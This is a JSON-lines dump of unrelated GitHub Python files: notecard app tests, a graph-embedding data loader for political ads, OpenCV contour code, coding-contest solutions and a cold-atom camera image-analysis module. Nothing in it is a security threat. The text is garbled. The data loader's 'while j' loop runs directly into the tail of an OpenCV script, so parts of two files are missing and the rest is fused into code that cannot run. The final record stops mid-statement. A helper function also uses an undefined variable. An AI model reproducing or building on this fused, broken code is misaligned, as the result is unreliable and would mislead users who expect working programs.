+{"seq_id":"16757119934","text":"\"\"\"\ntesting of the config.py script\n\"\"\"\nfrom rNotecards.config import Config\nfrom rNotecards.constants import PROJECT_ROOT_DIR\nfrom rNotecards.main import RNotecardApp, RNotecard\nimport shutil\nimport pandas as pd\nimport os\nimport time\nimport gc\n\n\ndef test__load_excel_data():\n file_path = str(PROJECT_ROOT_DIR / 'tests' / 'data' / 'test__notecards_data.xlsx')\n backup_file_path = file_path.split('.xlsx')[0] + '_backup.xlsx'\n test_app = RNotecardApp(file_path, backup_file_path)\n\n expected_keys = ['deck01', 'deck02']\n actual_keys = list(test_app.rnotecard_sets_dict.keys())\n assert actual_keys == expected_keys, f\"Keys do not match. Expected {expected_keys}, but got {actual_keys}\"\n\n # Assumed test data\n expected_data = {\n 'deck01': [\n {'front': 'this is the first entered card from deck01', 'back': 'a'},\n {'front': 'this is the second entered card from deck01', 'back': 'b'},\n {'front': 'this is the third entered card from deck01', 'back': 'c'}\n ],\n 'deck02': [\n {'front': 'this is the first entered card from deck02', 'back': 'a'},\n {'front': 'this is the second entered card from deck02', 'back': 'b'},\n {'front': 'this is the third entered card from deck02', 'back': 'c'},\n {'front': 'this is the fourth entered card from deck02', 'back': 'd'}\n ]\n # add more decks if needed\n }\n\n for key, rnotecard_set in test_app.rnotecard_sets_dict.items():\n # Check the id field\n assert rnotecard_set.id == key, f\"For key {key}, expected id {key} but got {rnotecard_set.id}\"\n\n # Check the notecards list\n expected_notecards = expected_data[key]\n actual_notecards = [notecard.data for notecard in rnotecard_set.notecards]\n\n assert \\\n actual_notecards == expected_notecards, \\\n f\"For key {key}, expected notecards {expected_notecards} but got {actual_notecards}\"\n\n\ndef test__save_to_excel():\n # Step 1: Create a copy of the original Excel file for testing\n original_excel_path = str(PROJECT_ROOT_DIR / 'tests' / 'data' / 'test__notecards_data.xlsx')\n temp_excel_path = str(PROJECT_ROOT_DIR / 'tests' / 'data' / 'temp_test__notecards_data.xlsx')\n backup_temp_excel_file_path = temp_excel_path.split('.xlsx')[0] + '_backup.xlsx'\n shutil.copyfile(original_excel_path, temp_excel_path)\n\n # Step 2: Load the Excel file into an RNotecardApp object\n test_app = RNotecardApp(temp_excel_path, backup_temp_excel_file_path)\n\n # Step 3: Make some changes to the notecards\n new_card = RNotecard({'front': 'new front', 'back': 'new back'})\n test_app.rnotecard_sets_dict['deck01'].notecards.append(new_card)\n\n # Step 4: Call the 
save_to_excel method\n test_app.save_to_excel()\n\n del test_app\n gc.collect()\n # Step 5: Reload the Excel file and verify changes\n with pd.ExcelFile(temp_excel_path) as xls: # Using 'with' ensures the file is closed after use\n df = pd.read_excel(xls, 'RN__deck01', engine='openpyxl')\n df.columns = map(str.lower, df.columns)\n\n # Verify that the new card has been added\n assert (\"new front\", \"new back\") in zip(df['front'], df['back']), \"New card was not saved to Excel\"\n\n # Clean up: Remove the temporary Excel file\n os.remove(temp_excel_path)\n\n\ndef test__rnotecard():\n original_excel_path = str(PROJECT_ROOT_DIR / 'tests' / 'data' / 'test__notecards_data__02.xlsx')\n temp_excel_path = str(PROJECT_ROOT_DIR / 'tests' / 'data' / 'temp_test__notecards_data__02.xlsx')\n backup_temp_excel_file_path = temp_excel_path.split('.xlsx')[0] + '_backup.xlsx'\n shutil.copyfile(original_excel_path, temp_excel_path)\n\n # Step 2: Load the Excel file into an RNotecardApp object\n test_app = RNotecardApp(temp_excel_path, backup_temp_excel_file_path)\n test_app.rnotecard_sets_dict['interview_quests'].notecards[0].calculate_total_perf_score()\n assert test_app.rnotecard_sets_dict['interview_quests'].notecards[0].data.get('total_perf_score') == -2.875\n\n del test_app\n gc.collect()\n os.remove(temp_excel_path)\n","repo_name":"ropreso/rNotecards","sub_path":"tests/test__main.py","file_name":"test__main.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20224201631","text":"import numpy\nimport random\nfrom random import shuffle\nfrom numpy import array\nfrom Embedder import Embedder\nimport torch\nimport torch.optim as optim\nimport time\nimport pickle\n\n\nclass NodeInputData:\n\n def __init__(self, batch_size=30):\n\n with open('data.pickle', 'rb') as in_file:\n [self.graph, self.id2name, self.name2id, self.stance_start, self.stance_end, self.issue_start, self.issue_end, self.ad_start, self.ad_end,\\\n self.funding_entity_start, self.funding_entity_end, self.issue_unigram_start, self.issue_unigram_end, self.personal_unigram_start,\\\n self.personal_unigram_end, self.policy_unigram_start, self.policy_unigram_end, self.indicator_label_start, self.indicator_label_end, \\\n self.annotated_ads, self.annotated_funding_entities, self.ad2tokenized_text, self.weights_matrix, self.id2text, self.entity_indicators, \\\n self.left_entity_indicators, self.right_entity_indicators, self.ad2annotated_stance, self.ad2annotated_issue,\\\n self.ad2personal_policy_annotation]=pickle.load(in_file, encoding=\"bytes\")\n\n self.all_stances=set([i for i in range(self.stance_start, self.stance_end+1)])\n self.all_issues=set([i for i in range(self.issue_start, self.issue_end+1)])\n self.all_ads=set([i for i in range(self.ad_start, self.ad_end+1)])\n self.all_funding_entities=set([i for i in range(self.funding_entity_start, self.funding_entity_end+1)])\n self.all_issue_unigrams=set([i for i in range(self.issue_unigram_start, self.issue_unigram_end+1)])\n self.all_personal_unigrams=set([i for i in range(self.personal_unigram_start, self.personal_unigram_end+1)])\n self.all_policy_unigrams=set([i for i in range(self.policy_unigram_start, self.policy_unigram_end+1)])\n self.all_indicator_labels=set([i for i in range(self.indicator_label_start, self.indicator_label_end+1)])\n \n\n\n self.ad2stance_adj_pos={}\n self.ad2funding_entity_adj_pos={}\n self.ad2personal_unigram_adj_pos={}\n self.ad2policy_unigram_adj_pos={}\n 
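# one *_adj_pos map per edge type: node id -> set of observed neighbours; the\n        # matching *_adj_neg maps below hold the complements, presumably used for\n        # negative sampling when training batches are built\n        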
self.ad2issue_unigram_adj_pos={}\n self.funding_entity2stance_adj_pos={}\n self.issue_unigram2issue_adj_pos={}\n self.issue2indicator_label_adj_pos={}\n self.personal_unigram2indicator_label_adj_pos={}\n self.policy_unigram2indicator_label_adj_pos={}\n\n self.ad2stance_adj_neg = {}\n self.ad2funding_entity_adj_neg = {}\n self.ad2personal_unigram_adj_neg = {}\n self.ad2policy_unigram_adj_neg = {}\n self.ad2issue_unigram_adj_neg = {}\n self.funding_entity2stance_adj_neg = {}\n self.issue_unigram2issue_adj_neg = {}\n self.issue2indicator_label_adj_neg = {}\n self.personal_unigram2indicator_label_adj_neg = {}\n self.policy_unigram2indicator_label_adj_neg = {}\n\n self.all_nodes_to_train=None\n\n self.batch_size=batch_size\n\n\n def get_nodes(self, training_graph):\n\n #print (len(training_graph))\n \n for ad in self.all_ads:\n adjacency_list=training_graph[ad]\n\n if len(adjacency_list & self.all_stances)>0:\n self.ad2stance_adj_pos[ad]=adjacency_list & self.all_stances\n self.ad2stance_adj_neg[ad] = self.all_stances - self.ad2stance_adj_pos[ad]\n if len(adjacency_list & self.all_funding_entities)>0:\n self.ad2funding_entity_adj_pos[ad]=adjacency_list & self.all_funding_entities\n self.ad2funding_entity_adj_neg[ad] = self.all_funding_entities - self.ad2funding_entity_adj_pos[ad]\n if len(adjacency_list & self.all_personal_unigrams)>0:\n self.ad2personal_unigram_adj_pos[ad]=adjacency_list & self.all_personal_unigrams\n self.ad2personal_unigram_adj_neg[ad] = self.all_personal_unigrams - self.ad2personal_unigram_adj_pos[ad]\n if len(adjacency_list & self.all_policy_unigrams)>0:\n self.ad2policy_unigram_adj_pos[ad]=adjacency_list & self.all_policy_unigrams\n self.ad2policy_unigram_adj_neg[ad] = self.all_policy_unigrams - self.ad2policy_unigram_adj_pos[ad]\n if len(adjacency_list & self.all_issue_unigrams)>0:\n self.ad2issue_unigram_adj_pos[ad]=adjacency_list & self.all_issue_unigrams\n self.ad2issue_unigram_adj_neg[ad] = self.all_issue_unigrams - self.ad2issue_unigram_adj_pos[ad]\n\n for funding_entity in self.all_funding_entities:\n adjacency_list=training_graph[funding_entity]\n\n if len(adjacency_list & self.all_stances)>0:\n self.funding_entity2stance_adj_pos[funding_entity]=adjacency_list & self.all_stances\n self.funding_entity2stance_adj_neg[funding_entity] = self.all_stances - self.funding_entity2stance_adj_pos[funding_entity]\n\n for iu in self.all_issue_unigrams:\n \n adjacency_list = training_graph[iu]\n #print (adjacency_list)\n \n if len(adjacency_list & self.all_issues) > 0:\n self.issue_unigram2issue_adj_pos[iu] = adjacency_list & self.all_issues\n self.issue_unigram2issue_adj_neg[iu] = self.all_issues - self.issue_unigram2issue_adj_pos[iu]\n\n for pu in self.all_personal_unigrams:\n adjacency_list = training_graph[pu]\n\n if len(adjacency_list & self.all_indicator_labels) > 0:\n self.personal_unigram2indicator_label_adj_pos[pu] = adjacency_list & self.all_indicator_labels\n self.personal_unigram2indicator_label_adj_neg[pu] = self.all_indicator_labels - self.personal_unigram2indicator_label_adj_pos[pu] - set([self.name2id['$issue']])\n\n for pu in self.all_policy_unigrams:\n adjacency_list = training_graph[pu]\n\n if len(adjacency_list & self.all_indicator_labels) > 0:\n self.policy_unigram2indicator_label_adj_pos[pu] = adjacency_list & self.all_indicator_labels\n self.policy_unigram2indicator_label_adj_neg[pu] = self.all_indicator_labels - self.policy_unigram2indicator_label_adj_pos[pu] - set([self.name2id['$issue']])\n\n for issue in self.all_issues:\n adjacency_list = 
training_graph[issue]\n\n if len(adjacency_list & self.all_indicator_labels) > 0:\n self.issue2indicator_label_adj_pos[issue] = adjacency_list & self.all_indicator_labels\n self.issue2indicator_label_adj_neg[issue] = self.all_indicator_labels - self.issue2indicator_label_adj_pos[issue]\n\n\n \n \n self.all_nodes_to_train=[i for i in training_graph]\n\n batches=[]\n \n discarded_nodes=0\n shuffle(self.all_nodes_to_train)\n \n #print (len(self.all_nodes_to_train))\n j=0\n while j 0):\n convexHull = cv2.convexHull(contour)\n cv2.drawContours(image=img, contours=[convexHull], contourIdx=-1, color=(0, 0, 255), thickness=2, lineType=cv2.LINE_AA)\n\n tmp+=1\n \n\n\n# Affichage de l'image\ncv2.imshow('gamma', gamma)\ncv2.imshow('Binaire', eroded)\ncv2.imshow('Contours', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"Thomas-aub/Licence-3","sub_path":"projet-analyse/analyse/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23506577411","text":"import numpy as np\r\n\r\nndigits = 16 # Half of\r\nncounts = 500\r\n\r\npowers = np.ndarray((11,), dtype=\"uint64\")\r\nspowers = \"\"\r\nfor n in range(2, 11):\r\n\tpowers[n] = n ** ndigits + 1\r\n\tspowers += \" \" + str(powers[n])\r\n\r\ndef num2strby2(n, length):\r\n\tres = \"\"\r\n\twhile n > 0:\r\n\t\tres = str(n % 2) + res\r\n\t\tn = n // 2\r\n\treturn res.zfill(length)\r\n\r\nwith open(\"c-large.txt\", \"w\") as f:\r\n\tf.write('Case #1:\\n' + '\\n'.join(['1' + num2strby2(ntry, ndigits - 2) + '11' + num2strby2(ntry, ndigits - 2) + '1' + spowers for ntry in range(ncounts)]))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_179/2180.py","file_name":"2180.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42620442229","text":"#!/bin/python3\nimport sys\ndef beautifulDays(i, j, k):\n # Complete this function\n li=[]\n for i in range(i,j+1):\n #print(i)\n a=i\n res=0\n while(a>0):\n rem=a%10\n res=rem+res*10\n a=a//10\n #print(i)\n #print(res)\n whole=abs(i-res)%k\n #print(whole)\n if(whole==0):\n li.append(i)\n return len(li)\ni, j, k = input().strip().split(' ')\ni, j, k = [int(i), int(j), int(k)]\nresult = beautifulDays(i, j, k)\nprint(result)\n","repo_name":"bhaskarkalahasthi/pythonprograms","sub_path":"Beautiful Days at the Movies algoritm in hacker rank.py","file_name":"Beautiful Days at the Movies algoritm in hacker rank.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29251206849","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 5 17:40:14 2022\r\n\r\n@author: Sommer Lab\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np \r\nimport matplotlib.patches as patches\r\nimport lmfit\r\nfrom lmfit import Parameters\r\nimport configparser \r\n\r\nclass AndorZyla: # Andor Zyla 5.5 \r\n def __init__(self):\r\n self.quantum_eff = .62 #Andor Zyla \r\n self.sensitivity = .45\r\n \r\nclass FLIRchameleon: #FLIR Chameleon3 CM3-U3-13S2M \r\n def __init__(self):\r\n self.quantum_eff = .50 \r\n self.sensitivity = .45 # numbers need to be updated \r\n \r\nclass ExperimentParams:\r\n def __init__(self, config, picturesPerIteration=1):\r\n \"\"\" \r\n Parameters\r\n ----------\r\n config : TYPE\r\n DESCRIPTION.\r\n picturesPerIteration : TYPE, 
optional\r\n picturesPerIteration : int\r\n How many pictures does Cicero take in each iteration? (typically 2 or 3) The default is 1.\r\n \"\"\"\r\n #input parameters from config file\r\n self.config = config\r\n self.picturesPerIteration = picturesPerIteration\r\n self.number_of_pics = int(config['Acquisition']['NumberinKineticSeries'])\r\n assert self.number_of_pics % picturesPerIteration == 0, \"Number of pictures should be a multiple of picturesPerIteration\" # checks for error\r\n self.number_of_iterations = int(self.number_of_pics / picturesPerIteration)\r\n \r\n self.height1 = int(config['FullImage']['VerticalEnd']) - int(config['FullImage']['VerticalStart']) + 1\r\n self.width1 = int(config['FullImage']['HorizontalEnd']) - int(config['FullImage']['HorizontalStart']) + 1 \r\n self.bin_horizontal = int(config['FullImage']['HorizontalBin'])\r\n self.bin_vertical = int(config['FullImage']['VerticalBin'])\r\n \r\n # image height, width and range after binning\r\n self.height = int(self.height1/self.bin_vertical)\r\n self.width = int(self.width1/self.bin_horizontal)\r\n self.xmin=int(0) #origin placed at zero by python\r\n self.ymin=int(0) #origin placed at zero by python\r\n self.xmax=self.width-1\r\n self.ymax=self.height-1 \r\n self.number_of_pixels = self.height*self.width\r\n \r\n self.data_type = np.int16\r\n self.ready_to_save = 'true'\r\n\r\n self.camera=AndorZyla()\r\n \r\n P_MOT_beam = 14e-3 #power per MOT beam, roughly 1/4 of what goes into octopus\r\n self.pixel_size = 1/(22.2e3) #obtained from measurement of magnification using ambient light\r\n r_beam = .01 #meters\r\n I1 = 2*P_MOT_beam/(np.pi*r_beam**2)\r\n I = 6*I1\r\n Isat = 25 #W/m^2\r\n self.s = I/Isat\r\n self.gamma = 36.898e6\r\n self.delta = 26e6*2*np.pi\r\n self.R_scat = self.gamma*.5*self.s/(1+self.s+(2*self.delta/self.gamma)**2)\r\n self.t_exp = float(config['Acquisition']['ExposureTime']) \r\n aperture_radius = 6.73/2 #in mm, the radius of the iris placed at the lens directly after the chamber where the MOT starts to get blocked\r\n cos_theta = 150/np.sqrt(aperture_radius**2+150**2)\r\n self.solid_angle = 2*np.pi*(1-cos_theta)\r\n\r\ndef LoadConfigFile(dataFolder=\".\", configFileName='config.cfg'): \r\n config_file = dataFolder + \"//\" + configFileName\r\n config = configparser.ConfigParser()\r\n config.read(config_file)\r\n return config\r\n \r\ndef LoadTOF(dataFolder='.', TOF_filename='TOF_list.txt', units_of_tof='ms'): \r\n tof_list = np.loadtxt(dataFolder + \"//\" + TOF_filename)\r\n return tof_list, units_of_tof \r\n \r\n\r\ndef loadPGM(filename):\r\n \r\n with open(filename, 'r') as f:\r\n filetype = f.readline()\r\n if filetype.strip() != \"P2\":\r\n raise Exception(\"wrong format, should be P2\")\r\n return\r\n \r\n res = f.readline().split()\r\n cols = int(res[0])\r\n rows = int(res[1])\r\n pixel_number = rows*cols\r\n \r\n maxval = f.readline()\r\n \r\n datastrings = f.read().split()\r\n data = [x for x in map(int, datastrings)]\r\n rows2discard = 2\r\n data = data[(cols*rows2discard):] # discard the first two rows\r\n rows = rows-rows2discard\r\n data_array = np.array(data)\r\n data_array = np.reshape(data_array, (rows,cols))\r\n \r\n return data_array \r\n \r\n\r\n# to load a numbered series of FLIR .pgm images into a 4D numpy array\r\n# filenames must be in this format: root + number.pgm. 
Numers must start from 1 \r\ndef loadSeriesPGM(params, root_filename, number_of_pics=1, picturesPerIteration=1 , n_params=0, data_folder= \".\" , background_file_name=\"\"):\r\n# n_params is the number of embedded image information fields which are checked, values between 0 to 10, default 0 \r\n# zero is black, maxval is white\r\n# maxval that our files show is 65536 because of the 2 byte packets but the ADC is 12 bit so\r\n# i think in practice pixel values are between 0 and 4096 \r\n# the standard binary .pgm file starts with string P5 \\n width space height \\n 65535 \\n\r\n\r\n# read the background image into a 1d numpy array whose size is pixel_nimber\r\n# width and height of the background images should be the same as the series of images \r\n number_of_iterations = int(number_of_pics/picturesPerIteration)\r\n\r\n filename = data_folder + \"\\\\\" + root_filename + str(1)+ \".pgm\" \r\n first_image = loadPGM(filename) \r\n rows,cols = np.shape(first_image)\r\n \r\n pixel_number = rows*cols\r\n \r\n if background_file_name:\r\n bg_filename = data_folder + \"\\\\\" + background_file_name \r\n bg_data_array = loadPGM(bg_filename)\r\n else:\r\n bg_data_array = np.zeros((rows,cols), first_image.dtype)\r\n \r\n \r\n image_array = np.zeros((number_of_iterations, picturesPerIteration, rows, cols))\r\n\r\n for iteration in range(number_of_iterations):\r\n for picture in range(picturesPerIteration):\r\n x = iteration*picturesPerIteration + picture\r\n filename = data_folder + \"\\\\\" + root_filename + str(x+1)+ \".pgm\" \r\n data_array_corrected = loadPGM(filename) - bg_data_array\r\n image_array[iteration, picture,:,:] = data_array_corrected\r\n \r\n return image_array\r\n \r\n \r\n \r\n \r\n # with open(bg_filename, 'r') as f:\r\n # filetype = f.readline()\r\n # if filetype.strip() != \"P2\":\r\n # raise Exception(\"wrong format, should be P2\")\r\n # return\r\n \r\n # bg_res = f.readline().split()\r\n # bg_cols = int(bg_res[0])\r\n # bg_rows = int(bg_res[1])\r\n # bg_pixel_number = bg_rows*bg_cols\r\n \r\n # bg_maxval = f.readline()\r\n \r\n # bg_datastrings = f.read().split()\r\n # bg_data = [x for x in map(int, bg_datastrings)]\r\n \r\n # rows2discard = bg_rows-rows\r\n # bg_data = bg_data[(cols*rows2discard):] # discard the first rows2discard rows\r\n # bg_data_array = np.array(bg_data)\r\n \r\n \r\n \r\n # bg_data_array = np.array(bg_data)\r\n\r\n\r\n# read all images in the series into a 1D numpy array whose length is number_of_pics*pixel_number\r\n# also background correct all images\r\n \r\n # with open(filename, 'r') as f:\r\n # filetype = f.readline()\r\n # if filetype.strip() != \"P2\":\r\n # raise Exception(\"wrong format, should be P2\")\r\n # return\r\n \r\n # res = f.readline().split()\r\n # cols = int(res[0])\r\n # if bg_cols != cols: \r\n # raise Exception(\"background image doesnt have same number of columns as data\")\r\n # rows = int(res[1])\r\n # if bg_rows != rows:\r\n # raise Exception(\"background doesnt have same number of rows as data\")\r\n # pixel_number = rows*cols\r\n # if bg_pixel_number != pixel_number:\r\n # raise Exception(\"background doesnt have same pixel number as data\")\r\n # print(\"Resolution is: Columns=\",cols,\" and Rows=\", rows, \".\")\r\n # print(\"Total number of pixels =\", pixel_number)\r\n \r\n # maxval = f.readline()\r\n \r\n # datastrings = f.read().split()\r\n # data = [x for x in map(int, datastrings)]\r\n # #data = data[(cols*2)-1:] # discard the first two rows\r\n # f.close()\r\n \r\n # data_array = np.array(data) # convert into a 
numpy array \r\n \r\n #data_array_corrected = data_array - bg_data_array # all images are background corrected\r\n\r\n # print(\"frame #\", x+1 , \"max value before background subtraction = \"+str(np.max(data_array)))\r\n # print(\"frame #\", x+1 , \"min value before background subtraction = \"+str(np.min(data_array)))\r\n # print(\"frame #\", x+1 , \"max value after background subtraction = \"+str(np.max(data_array_corrected)))\r\n # print(\"frame #\", x+1 , \"min value after background subtraction = \"+str(np.min(data_array_corrected)))\r\n\r\n # # uppend the image to the larger 1D numpy array that contains all the images back to back and in order \r\n # image_array[x*pixel_number: (x+1)*pixel_number] = data_array\r\n # image_array_corrected[x*pixel_number: (x+1)*pixel_number] = data_array_corrected\r\n\r\n # images = np.reshape(image_array_corrected,(number_of_iterations, picturesPerIteration, rows, cols))\r\n # return images \r\n \r\n # reshape the total_image_array_corrected into a 4D array\r\n # outermost dimension's size is equal to the number of iterations, \r\n # 2nd outer dimensions size is number of pictures per iteration\r\n # 3rd dimensions size is equal to the height of the images \r\n\r\n# to load a series of non-spooled Andor .dat images into a 4D numpy array\r\ndef LoadSeries(params, root_filename, data_folder= \".\" , background_file_name= \"background.dat\"):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n params : ExperimentParams object\r\n Contains config, number_of_pixels, and other parameters \r\n data_folder : string\r\n path to the folder with the spooled series data, and the background image\r\n background_file_name : string\r\n name of background image, assumed to be in the data_folder\r\n \r\n Returns\r\n -------\r\n 4D array of integers giving the background-subtracted camera counts in each pixel.\r\n Format: images[iterationNumber, pictureNumber, row, col]\r\n \r\n \"\"\"\r\n background_array = np.zeros(params.number_of_pixels)\r\n #Load background image into background_array\r\n if background_file_name:\r\n background_img = data_folder + \"//\" + background_file_name\r\n file=open(background_img,\"rb\")\r\n content=file.read()\r\n background_array = np.frombuffer(content, dtype=params.data_type)\r\n background_array = background_array[0:params.number_of_pixels]\r\n file.close()\r\n\r\n #read the whole kinetic series, bg correct, and load all images into a numpy array called image-array_correcpted\r\n image_array = np.zeros(shape = (1, params.number_of_pixels * params.number_of_pics))[0] \r\n image_array_corrected = np.zeros(shape = (1, params.number_of_pixels * params.number_of_pics))[0]\r\n for x in range(params.number_of_pics): \r\n filename = data_folder + \"\\\\\" + root_filename + str(x+1)+ \".dat\" \r\n file = open(filename,\"rb\")\r\n content = file.read()\r\n data_array = np.frombuffer(content, dtype=params.data_type)\r\n data_array = data_array[0:params.number_of_pixels]\r\n data_array_corrected = data_array - background_array \r\n image_array[x*params.number_of_pixels: (x+1)*params.number_of_pixels] = data_array\r\n print(\"max value before background subtraction = \"+str(np.max(image_array)))\r\n image_array_corrected[x*params.number_of_pixels: (x+1)*params.number_of_pixels] = data_array_corrected\r\n #print(\"max value after background subtraction = \"+str(np.max(image_array_corrected)))\r\n \r\n # reshape the total_image_array_corrected into a 4D array\r\n # outermost dimension's size is equal to the number of iterations, \r\n # 2nd outer 
dimensions size is number of pictures per iteration\r\n # 3rd dimensions size is equal to the height of the images\r\n #print(params.number_of_iterations, params.picturesPerIteration, params.height, params.width)\r\n images = np.reshape(image_array_corrected,(params.number_of_iterations, params.picturesPerIteration, params.height, params.width))\r\n return images\r\n\r\ndef LoadSpooledSeries(params, data_folder= \".\" , background_file_name= \"spool_background.dat\"):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n params : ExperimentParams object\r\n Contains config, number_of_pixels, and other parameters \r\n data_folder : string\r\n path to the folder with the spooled series data, and the background image\r\n background_file_name : string\r\n name of background image, assumed to be in the data_folder\r\n \r\n Returns\r\n -------\r\n 4D array of integers giving the background-subtracted camera counts in each pixel.\r\n Format: images[iterationNumber, pictureNumber, row, col]\r\n \r\n \"\"\"\r\n background_array = np.zeros(params.number_of_pixels)\r\n #Load background image into background_array\r\n if background_file_name:\r\n background_img = data_folder + \"//\" + background_file_name\r\n file=open(background_img,\"rb\")\r\n content=file.read()\r\n background_array = np.frombuffer(content, dtype=params.data_type)\r\n background_array = background_array[0:params.number_of_pixels]\r\n file.close()\r\n\r\n #read the whole kinetic series, bg correct, and load all images into a numpy array called image-array_correcpted\r\n image_array = np.zeros(shape = (1, params.number_of_pixels * params.number_of_pics))[0] \r\n image_array_corrected = np.zeros(shape = (1, params.number_of_pixels * params.number_of_pics))[0]\r\n spool_number = '0000000000'\r\n for x in range(params.number_of_pics): \r\n filename = data_folder + \"\\\\\"+ str(x)[::-1] + spool_number[0:(10-len(str(x)))]+\"spool.dat\" \r\n file = open(filename,\"rb\")\r\n content = file.read()\r\n data_array = np.frombuffer(content, dtype=params.data_type)\r\n data_array = data_array[0:params.number_of_pixels] # a spool file that is not bg corrected\r\n data_array_corrected = data_array - background_array #spool file that is background corrected\r\n image_array[x*params.number_of_pixels: (x+1)*params.number_of_pixels] = data_array\r\n print(\"max value before background subtraction = \"+str(np.max(image_array)))\r\n image_array_corrected[x*params.number_of_pixels: (x+1)*params.number_of_pixels] = data_array_corrected\r\n #print(\"max value after background subtraction = \"+str(np.max(image_array_corrected)))\r\n \r\n # reshape the total_image_array_corrected into a 4D array\r\n # outermost dimension's size is equal to the number of iterations, \r\n # 2nd outer dimensions size is number of pictures per iteration\r\n # 3rd dimensions size is equal to the height of the images\r\n #print(params.number_of_iterations, params.picturesPerIteration, params.height, params.width)\r\n images = np.reshape(image_array_corrected,(params.number_of_iterations, params.picturesPerIteration, params.height, params.width))\r\n return images\r\n\r\ndef CountsToAtoms(params, counts):\r\n \"\"\"\r\n Convert counts to atom number for fluorescence images\r\n \r\n Parameters\r\n ----------\r\n params : ExperimentParams object\r\n \r\n counts : array or number\r\n Camera counts from fluorescence image\r\n \r\n Returns\r\n -------\r\n Atom number (per pixel) array in same shape as input counts array\r\n\r\n \"\"\"\r\n return 
(4*np.pi*counts*params.camera.sensitivity)/(params.camera.quantum_eff*params.R_scat*params.t_exp*params.solid_angle)\r\n \r\n\r\ndef ShowImages3d(images):\r\n \"\"\"\r\n Draws a grid of images\r\n\r\n Parameters\r\n ----------\r\n images : 3d Array\r\n\r\n \"\"\"\r\n iterations, height, width = np.shape(images)\r\n #print(iterations,picturesPerIteration)\r\n #imax = np.max(images)\r\n #imin = np.min(images)\r\n \r\n for it in range(iterations):\r\n print(it)\r\n ax = plt.subplot(iterations,1,1)\r\n ax.imshow(images[it,:,:],cmap=\"gray\")#,vmin = imin, vmax=imax)\r\n plt.tight_layout()\r\n plt.show()\r\n\r\ndef ShowImages(images):\r\n \"\"\"\r\n Draws a grid of images\r\n\r\n Parameters\r\n ----------\r\n images : 4d Array\r\n\r\n \"\"\"\r\n iterations, picturesPerIteration, height, width = np.shape(images)\r\n #print(iterations,picturesPerIteration)\r\n #imax = np.max(images)\r\n #imin = np.min(images)\r\n \r\n for it in range(iterations):\r\n for pic in range(picturesPerIteration):\r\n ax = plt.subplot(iterations, picturesPerIteration, it*picturesPerIteration + pic+1)\r\n ax.imshow(images[it,pic,:,:],cmap=\"gray\")#,vmin = imin, vmax=imax)\r\n plt.tight_layout()\r\n plt.show()\r\n \r\ndef ShowImagesTranspose(images, autoscale=True):\r\n \"\"\"\r\n Draws a grid of images\r\n\r\n Parameters\r\n ----------\r\n images : 4d Array\r\n \r\n autoscale: boolean\r\n True: scale each image independently\r\n\r\n \"\"\"\r\n iterations, picturesPerIteration, height, width = np.shape(images)\r\n \r\n #print(iterations,picturesPerIteration)\r\n \r\n if not autoscale:\r\n imax = np.max(images)\r\n imin = np.min(images)\r\n \r\n for it in range(iterations):\r\n for pic in range(picturesPerIteration):\r\n print(it,pic)\r\n ax = plt.subplot(picturesPerIteration, iterations, pic*iterations + it+1)\r\n if autoscale:\r\n ax.imshow(images[it,pic,:,:],cmap=\"gray\")#,vmin = imin, vmax=imax)\r\n else:\r\n ax.imshow(images[it,pic,:,:],cmap=\"gray\",vmin = imin, vmax=imax)\r\n plt.tight_layout()\r\n plt.show()\r\n \r\n \r\n\r\n# simple, no analysis, list of pics => normalized\r\ndef ImageTotals(images):\r\n \"\"\"\r\n \r\n ----------\r\n images : 4D array of images\r\n \r\n Returns\r\n -------\r\n 2D Array of sums over the images\r\n\r\n \"\"\"\r\n \r\n shape1 = np.shape(images)\r\n assert len(shape1) == 4, \"input array must be 4D\"\r\n \r\n shape2 = shape1[:-2]\r\n totals = np.zeros(shape2)\r\n \r\n for i in range(shape2[0]):\r\n for j in range(shape2[1]):\r\n totals[i,j] = np.sum(images[i,j,:,:])\r\n return totals\r\n \r\ndef temp(images): \r\n atoms_x = np.zeros((params.number_of_pics, params.width))\r\n atoms_y = np.zeros((params.number_of_pics, params.height)) \r\n \r\n #Sum the columns of the region of interest to get a line trace of atoms as a function of x position\r\n for i in range(params.number_of_iterations):\r\n for j in range(params.picturesPerIteration) :\r\n im_temp = images[i, j, params.ymin:params.ymax, params.xmin:params.xmax]\r\n count_x = np.sum(im_temp,axis = 0) #sum over y direction/columns \r\n count_y = np.sum(im_temp,axis = 1) #sum over x direction/rows\r\n atoms_x[i] = (4*np.pi*count_x*params.sensitivity)/(params.quantum_eff*params.R_scat*params.t_exp*params.solid_angle)\r\n atoms_y[i] = (4*np.pi*count_y*params.sensitivity)/(params.quantum_eff*params.R_scat*params.t_exp*params.solid_angle)\r\n print(\"num_atoms_vs_x in frame\" , i, \"is: {:e}\".format(np.sum(atoms_x[i])))\r\n print(\"num_atoms_vs_y in frame\" , i, \"is: {:e}\".format(np.sum(atoms_y[i])))\r\n \r\n if atoms_x != 
